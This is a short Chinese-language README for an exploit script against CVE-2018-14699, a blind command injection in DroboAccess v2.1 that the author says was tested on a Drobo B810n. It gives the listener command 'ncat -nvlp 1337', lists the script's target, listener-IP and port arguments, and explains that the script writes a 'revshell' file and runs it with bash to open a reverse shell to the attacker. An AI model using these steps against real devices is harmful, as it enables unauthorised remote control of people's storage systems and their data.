首先启动一个监听器(ncat -nvlp 1337)
然后运行漏洞利用脚本
'-t', '--target', help='用于利用的主机,例如 192.168.1.122:8080', required=True
'-l', '--listener-ip', help='监听器 IP', required=True
'-p', '--port', help='监听器的端口号', required=True
CVE-2018-14699 是 DroboAccess v2.1 中的一个盲目命令注入漏洞。问题出在 enable_user 函数将用户名参数作为用户输入,然后调用了一个直接执行 shell 的依赖,且没有任何清理操作。我澄清这一点,因为似乎在其他地方没有对此的引用。所以再次强调,这不是 Drobo 5N2 的漏洞,而是 DroboAccess 的漏洞。已在 B810n 上测试成功。
该脚本会尝试将一个脚本回显到当前工作目录下名为 revshell 的文件中。如果成功,它将尝试用 bash 作为可执行文件调用该脚本,从而使用 bash 向你监听器建立反向连接!